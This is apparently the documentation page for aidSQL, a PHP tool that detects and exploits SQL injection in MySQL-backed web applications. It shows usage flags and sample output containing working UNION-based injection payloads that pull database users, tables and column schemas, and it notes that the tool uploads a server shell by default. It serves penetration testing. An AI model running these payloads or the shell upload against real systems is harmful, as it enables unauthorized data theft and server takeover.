Menu

aidsql-en




aidsql

Phase(s):

Primary: Exploitation.
Secondary: N/A.

Description:

Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.

Objective:

  • Automated detection of parameters vulnerable to SQL Injection.
  • Automated and configurable data base data mining.
  • Automated shell upload in order to comprise the application server.

Features:

Supported technologies: Web applications (HTTP/HTTPS) with a MySQL database backend.

Operative mode: Active.

Automated detection of parameters vulnerable to SQL Injection.

  • Automated parameter tampering for both URL parameters (GET) and form data (POST).
  • Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
  • Provides the name of the parameter and URL from the detected vulnerabilities.

Automated and configurable data base data mining.

  • Retrieves the following information
    • Database user name.
    • Database name.
    • Database version.
    • Database tables.
    • Database tables schema: keys, fields names and type.

Reports:
Output reports:

  • Merge report from the exploitation and data mining in TXT and XML format.

    Basic usage:

    Perform an automated scan on a web application. The following instruction initiates an automated scan on the web application.

    ./aidSQL --url=[URL] --no-shell


    Dónde:

    • --url: Web application URL address.
    • --no-shell: Disabled the option to upload a shell.

    Note: By defect the tool is configured to perform the data mining and upload a shell upon discovering a vulnerable parameter, thus it is recommended to disable the shell option to minimize the impact it may have on the web application and/or application server.

    The tool will begin with crawling through the web application in order to generate the site-map of the pages and parameters present.

    Normalized URL: http://midominio.com.mx/miaplicacion/

    Crawling ...

    Fetching content from http://midominio.com.mx/miaplicacion/

    200 OK

    TOTAL URL's found: 55

    Add file index.jsp ...

    Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html

    Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"

    Parsing previously crawled URL, looking for new parameters

    Adding new parameter "do"


    This information is used next on the detection of vulnerable parameters through the injection of predefined SQL injections (UNION queries) and the analysis of the web application responses.

    Testing links ...

    1. { http://midominio.com.mx/miaplicacion/index.jsp }

    Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp
    Set method GET …

    Load sqli => mysql5 ... OK

    Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome

    sql injection plugin...

    [1][ [message] | METHOD: unionQuery

    [QUERY] | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*

    Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+
    UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A
    [WW] WARNING: GOT 403

    [2][ message] | METHOD: unionQuery …


    During the scan execution, when a vulnerable parameter is detected, the data mining will be called to extract the information from the database.

    Site is vulnerable to sql injection!

    Skipping calling plugin's get shell method

    Fetching database user ...

    [message] | METHOD: unionQuery

    [QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; -- Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+
    SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
    FOUND DATABASE seguridad
    [message] | METHOD: unionQuery

    [QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
    (TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,
    IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; --
    Normalized URL:
    http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
    UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
    TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C
    TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
    Fetching table "cuentas" columns ...

    [message] | METHOD: unionQuery

    [QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
    (COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5
    FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; --
    Normalized URL:
    http://midominio.com.mx/miaplicacion
    /index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
    UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
    COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+
    FROM+information_schema.columns+
    WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&password=prueba&user-info-php-submit-button=View%2BAccount%2BDetails&page=user-info.php


    When the scan is completed, the tool will display a summary report of the detected vulnerabilities and the scan duration.

    VULNERABLE LINKS FOUND : 1
    TOTAL TIME : 53 seconds


    La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna:

    • Folder /logs/\[application name\]
    • Log file - index.php_console.log
    • XML file - index.php_db_schemas.xml

    index.php_console.log file example:

    HOST midominio.com.mx ------------------------------------
    PLUGIN NAME : UNION
    PLUGIN AUTHOR : Juan Stange
    REQUEST VARIABLES : message, do, info, page,…
    VULNERABLE LINK : http://midominio.com.mx/miaplicacion
    /index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+
    SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
    COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e
    %29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+
    table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+
    ------------------------------------------------
    SCHEMA seguridad
    ------------------------------------------------
    VERSION : 5.5.16
    DATADIR :

    TABLE cuentas
    ---------------------
    type : BASE TABLE
    engine : InnoDB
    collation : latin1_swedish_ci
    increment : 1

    COLUMNS
    ---------------------
    NAME : cid
    type int(11)
    key 0
    extra 0
    NAME : username


    index.php_db_schemas.xml file example:

    <schemas>
    <database name="owasp10" version="5.5.16" datadir="">
    <tables>
    <table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1">
    <column name="cid"><type>int(11)</type><key>0</key><extra>0</extra></column>
    <column name="username"><type>text</type><key>0</key><extra>0</extra></column>


    Resources:

    Link: http://code.google.com/p/aidsql/.
    Author(s): jpfstange
    LynxSec IT consulting and security.
    Contact: lynxsec [at] gmail.com
    IRC: irc.freenode.net #aidsql
    Twitter: http://twitter.com/#!aidsql
    License: GNU GPL v2


Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.